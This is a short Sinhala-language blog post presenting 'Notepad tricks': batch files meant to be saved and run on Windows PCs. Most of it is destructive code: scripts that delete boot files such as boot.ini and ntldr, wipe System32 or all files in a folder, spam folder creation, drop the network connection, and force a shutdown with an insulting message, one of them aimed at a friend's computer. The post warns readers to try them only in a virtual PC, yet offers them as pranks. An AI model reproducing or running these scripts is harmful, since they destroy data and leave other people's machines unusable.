කොහොමද
කස්ටියට? ඔන්න මම අදත් ආවා අලුත්ම අලුත් post එකක් අරගෙන. මාතෘකාව දැක්කම තේරෙනවා නේද මොකක් ගැනද මම කියන්නෙ කියලා. ආයි ආයි කොල්ලාගේ තින හිනාව. හරි හරි ඔන්න නැවැතුවා. Ok! මෙම Notepad tricks අත්හදා බැලීම සදහා Virtual PC එකක්
භාවිතා කරන්න. ඒ මොකද කිවුවොත් මේවා සැබැවින්ම භයානක වන බැවිනි.
වැදගත්:-
මෙහි ඇති සියලුම Code, Notepad එක තුල ලබාදී ඔබ කැමති නමක් ලබාදී .bat ලෙස Save කල
යුතුය.
Com එක සදහටම ක්රියා විරහිත කිරීම.
code
into your notepad
@echo
off
attrib
-r -s -h c:\autoexec.bat
del
c:\autoexec.bat
attrib
-r -s -h c:\boot.ini
del
c:\boot.ini
attrib
-r -s -h c:\ntldr
del
c:\ntldr
attrib
-r -s -h c:\windows
\win.ini
del
c:\windows\win.ini
මෙමඟින්
ඔබේ පරිගණකය
ක්රියා
විරහිත කරන අතර එය නැවත
ක්රියාත්මක
කිරීමට අවශය File Delete කරයි.
මිනිත්තුවකට
Folder 4000 කටත් වඩා හදමු
@echo
off
:top
md
%random%
මේ Code
එක වැඩ නොකරන අය md %random% වැඩි වතාවක් යොදා බලන්න.
ඔබේ පරිගණක පද්ධතියම Delete කරන්න.
del
*.*
Internet Connection එක නැති කරලා දාන්න.
@Echo
off
Ipconfig
/release
මෙය නැවත
සැකසීමට
IPconfig
/renew
System 32 Folder එක නැති කරන්න
del
c:\WINDOWS\system32\*.*/q
මේක නැති
උනොත් Windows වැඩකරන්නෙ නෑ.
යාලුවට Warning එකක් දීලම එයාගෙ PC එක Shut Down කරන්න.
@echo
off
msg *
I don't like you
shutdown
-c "Error! You are too stupid!" -s
No comments:
Post a Comment